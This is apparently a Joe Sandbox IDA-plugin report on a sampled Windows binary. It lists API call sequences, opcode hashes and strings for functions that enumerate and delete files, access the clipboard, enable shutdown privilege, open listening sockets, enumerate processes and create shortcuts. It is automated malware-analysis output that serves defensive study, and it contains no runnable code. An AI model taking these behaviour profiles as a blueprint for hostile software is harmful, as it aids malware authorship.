                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 7ee0b1bd5271f8bd52f0d6372f2e8903a2889b09645b3757e96be4e9e9ceb84b
                                                        • Instruction ID: 6c3e668ef7f1261fe50b9d83a8cd76dd90b0d938e0df2656d4152267193aa9f1
                                                        • Opcode Fuzzy Hash: 7ee0b1bd5271f8bd52f0d6372f2e8903a2889b09645b3757e96be4e9e9ceb84b
                                                        • Instruction Fuzzy Hash: 042180396006109FDB14AF24EC09F6E7BA9EF15751F118029F9459B3B1DB70BD81CB54
                                                        APIs
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                          • Part of subcall function 00124A31: GetFileAttributesW.KERNEL32(?,0012370B), ref: 00124A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 001238A3
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0012394B
                                                        • MoveFileW.KERNEL32(?,?), ref: 0012395E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0012397B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012399D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 001239B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 9b3885dd099ff7ebb64d797f8d8dc2aab5552c89e785a292734463edded911db
                                                        • Instruction ID: 2d6131705638273813b34b29ce650a801f3e4c81a9fa4e55a0acf7b823502173
                                                        • Opcode Fuzzy Hash: 9b3885dd099ff7ebb64d797f8d8dc2aab5552c89e785a292734463edded911db
                                                        • Instruction Fuzzy Hash: DE51A03180415CAACF05EBA0EA92EEDB779AF15304F60016DF416B7192EF356F49CB60
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0012F440
                                                        • Sleep.KERNEL32(0000000A), ref: 0012F470
                                                        • _wcscmp.LIBCMT ref: 0012F484
                                                        • _wcscmp.LIBCMT ref: 0012F49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 0012F53D
                                                        • FindClose.KERNEL32(00000000), ref: 0012F553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 6d465f755f312bad07417240a432ea9a2f305471056997ac42aa3af4acfb26f5
                                                        • Instruction ID: 7092b49ea8ee9234017ac2638bcd7b0fd9f95d861864444316615acce71c3d90
                                                        • Opcode Fuzzy Hash: 6d465f755f312bad07417240a432ea9a2f305471056997ac42aa3af4acfb26f5
                                                        • Instruction Fuzzy Hash: C7416B7190025A9FCF14EF64EC49AEEBBB4FF15310F10447AE819A32A1DB309A96CF50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3c$_
                                                        • API String ID: 674341424-867841958
                                                        • Opcode ID: e10290a7f922d39205cade4bf69014416e59105877134af0e30b7fe9270bf919
                                                        • Instruction ID: 84ed1831b8629f6b5276daf64ee065d73b29300bf2cb04cc1db60d5a5b41954b
                                                        • Opcode Fuzzy Hash: e10290a7f922d39205cade4bf69014416e59105877134af0e30b7fe9270bf919
                                                        • Instruction Fuzzy Hash: C2228C716083019FD724DF14C891BAEB7E4AF84714F10492EF89A97392DB75EA44CBA3
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: debf5383e1c22df0c4c99dade529f23799817663fdf0c590f3e50887c8134b21
                                                        • Instruction ID: 1b07765bc4e09ab90c5b31bdc4ca08851569ce64d4106f250d179ca663b6b535
                                                        • Opcode Fuzzy Hash: debf5383e1c22df0c4c99dade529f23799817663fdf0c590f3e50887c8134b21
                                                        • Instruction Fuzzy Hash: B2128A70A00609DFDF18DFA5D981AEEB7F5FF48300F10452AE846A7291EB75AD90CB64
                                                        APIs
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                          • Part of subcall function 00124A31: GetFileAttributesW.KERNEL32(?,0012370B), ref: 00124A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00123B89
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00123BD9
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00123BEA
                                                        • FindClose.KERNEL32(00000000), ref: 00123C01
                                                        • FindClose.KERNEL32(00000000), ref: 00123C0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: 7a6d292bc3cb44e7790d926444e80675a731cd46fa57d1a870ac51ee9f6f6c55
                                                        • Instruction ID: b3f25445d4da1513984481961eb38b52d86b1a1c7c21ab70d46ae586fef3d373
                                                        • Opcode Fuzzy Hash: 7a6d292bc3cb44e7790d926444e80675a731cd46fa57d1a870ac51ee9f6f6c55
                                                        • Instruction Fuzzy Hash: 79318D350083959BC205EF24D891DEFB7A8BF96311F404E2DF4E5921A2EB34DA19CB62
                                                        APIs
                                                          • Part of subcall function 001187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011882B
                                                          • Part of subcall function 001187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00118858
                                                          • Part of subcall function 001187E1: GetLastError.KERNEL32 ref: 00118865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 001251F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: be3d36f41e6b5e16aac111b8b5d2789ec16b75e87a669b1fe9a7530ec8444e1a
                                                        • Instruction ID: 32ea9b4f66d5e9d1bbf745d3d1edcebe459f6eaf2c6265da101e32f2002c1236
                                                        • Opcode Fuzzy Hash: be3d36f41e6b5e16aac111b8b5d2789ec16b75e87a669b1fe9a7530ec8444e1a
                                                        • Instruction Fuzzy Hash: D4014239691631EBE72C2368BCCAFBA725AAB15380F200424F903E20D2DB705C6181A0
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 001362DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001362EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00136307
                                                        • listen.WSOCK32(00000000,00000005), ref: 00136316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00136330
                                                        • closesocket.WSOCK32(00000000), ref: 00136344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 36df1540be35585803b39e3cd0fea3f9ff096291da1a587bf74296eeee8632cf
                                                        • Instruction ID: 5a4ff1a9a4f9c641fb4e4bf84c8ee3c53622086365db5414f69e8817f388ab84
                                                        • Opcode Fuzzy Hash: 36df1540be35585803b39e3cd0fea3f9ff096291da1a587bf74296eeee8632cf
                                                        • Instruction Fuzzy Hash: 6421D075600200AFCB10EF64C849FAEB7A9FF49720F15816CF81AA73A2CB70AC41CB51
                                                        APIs
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                        • _memmove.LIBCMT ref: 00110258
                                                        • _memmove.LIBCMT ref: 0011036D
                                                        • _memmove.LIBCMT ref: 00110414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: f1de2566bcf98664b95038142588ffdd8e4ee09c6b2e7e35a51154708afd4289
                                                        • Instruction ID: 2efc27388af4188744047b56e568e2fec363577ea0e91d4c416fd145510d2531
                                                        • Opcode Fuzzy Hash: f1de2566bcf98664b95038142588ffdd8e4ee09c6b2e7e35a51154708afd4289
                                                        • Instruction Fuzzy Hash: 68029E70A00609DFCF09DF65D985AAE7BB5FF48300F148069E80AEB356EB75D990CB91
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 000C19FA
                                                        • GetSysColor.USER32(0000000F), ref: 000C1A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 000C1A61
                                                          • Part of subcall function 000C1290: DefDlgProcW.USER32(?,00000020,?), ref: 000C12D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: 4a168299af453b38c869f3290c98ce78a05e275194d22e2879183ec800fe96df
                                                        • Instruction ID: c7688ec3f32df569b5194d46ec9a195c07b2860deb0f92ba62f82af767b79b91
                                                        • Opcode Fuzzy Hash: 4a168299af453b38c869f3290c98ce78a05e275194d22e2879183ec800fe96df
                                                        • Instruction Fuzzy Hash: D2A12371106548BAE778AB299C44FFF35DDDB4B381B14011EF603D69A3CB219D42AAB3
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0012BCE6
                                                        • _wcscmp.LIBCMT ref: 0012BD16
                                                        • _wcscmp.LIBCMT ref: 0012BD2B
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0012BD3C
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0012BD6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: f89962661cf9afabca0d2a978b7dffca5462764e00e1a76db6aea7c41717f0f3
                                                        • Instruction ID: 9e51e1402698f1f651e1d42186460ae419e34ba3c2d01fd807ebedae3fead2c0
                                                        • Opcode Fuzzy Hash: f89962661cf9afabca0d2a978b7dffca5462764e00e1a76db6aea7c41717f0f3
                                                        • Instruction Fuzzy Hash: B3519A35608A169FC718DF68D4D0EEAB3E4EF49324F10461DE95A873A2DB30ED15CB91
                                                        APIs
                                                          • Part of subcall function 00137D8B: inet_addr.WSOCK32(00000000), ref: 00137DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0013679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001367C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00136800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0013680D
                                                        • closesocket.WSOCK32(00000000), ref: 00136821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: 5bf9cf55f31d722d383d61575092acfc866d9431b03835934666c1567d41397a
                                                        • Instruction ID: 0584262c4246c42d003bd38423f57e2107ced84f19295dc9531af34f53a4572a
                                                        • Opcode Fuzzy Hash: 5bf9cf55f31d722d383d61575092acfc866d9431b03835934666c1567d41397a
                                                        • Instruction Fuzzy Hash: 5841A375A00210AFDB50AF648C86FAE77E8EF49B14F44846CF916AB3D3CB709D418B91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 78b996fe836d05535afdbe0194890ef30e0bbed6374690cf8b606af0a308101a
                                                        • Instruction ID: ad0f923565e512a58a1b00fb0015052fc6b73e8cef86004e2e8a6116cce5e087
                                                        • Opcode Fuzzy Hash: 78b996fe836d05535afdbe0194890ef30e0bbed6374690cf8b606af0a308101a
                                                        • Instruction Fuzzy Hash: E911B231700911AFEB215F269C48B6E7B9AFF457A1B45403CF845D7263DB709C428AA4
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001180C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001180CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001180D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001180E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001180F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: e7c8c152df36fd607b3ff9f3ad97e1ea74d107737e38fe6db30e477de6c9dee8
                                                        • Instruction ID: f95c56d251d9e5630a88f0b81c4bd90420d2e33faf7b7c733b3a99e81fb1d63a
                                                        • Opcode Fuzzy Hash: e7c8c152df36fd607b3ff9f3ad97e1ea74d107737e38fe6db30e477de6c9dee8
                                                        • Instruction Fuzzy Hash: 69F04435240204BFE7100FA5DC8DEA73BADEF86755B104039F549C6260CB619C83DA60
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0012C432
                                                        • CoCreateInstance.OLE32(00152D6C,00000000,00000001,00152BDC,?), ref: 0012C44A
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • CoUninitialize.OLE32 ref: 0012C6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: f1167c6c1dda2d188a2e0e767ce62dc246e85b8817b7d8a61e148c908382e150
                                                        • Instruction ID: 093d9489ee286c5cd653e1bdf8ba83042952c8663423d21e3a2905561187a088
                                                        • Opcode Fuzzy Hash: f1167c6c1dda2d188a2e0e767ce62dc246e85b8817b7d8a61e148c908382e150
                                                        • Instruction Fuzzy Hash: 5EA13D71104205AFD700EF54C885EAFB7E8FF99354F00492CF5559B1A2EB71EA49CB62
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4AD0), ref: 000C4B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C4B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 513aba87b9586699345bcf93affac4c0236faa87a0c899bb8e3ecfa2755e2b9b
                                                        • Instruction ID: 6a89760ad99ce4a7481a136c4ed43e6dc561713ac53a8eedeecf6b17d5a58c53
                                                        • Opcode Fuzzy Hash: 513aba87b9586699345bcf93affac4c0236faa87a0c899bb8e3ecfa2755e2b9b
                                                        • Instruction Fuzzy Hash: 35D012B4A10713CFD7209F31D828F4676E4AF06791B11883DA485D6660D770D8C1C654
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0013EE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0013EE4B
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0013EF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0013EF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: f21d66deac0cfa78dd5fca5ff93c097f4d07e701055de01ec34d3237a6e3cc90
                                                        • Instruction ID: ac5a265914e71f205cea81d5fe2042d6ebc8656b388df692347bbdaecaa931cc
                                                        • Opcode Fuzzy Hash: f21d66deac0cfa78dd5fca5ff93c097f4d07e701055de01ec34d3237a6e3cc90
                                                        • Instruction Fuzzy Hash: 59515B71504311ABD310EF24CC85FAFB7E8EF98710F10482DF596972A2EB70A909CB92
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0011E628
                                                        Strings
                                                        Memory Dump Source
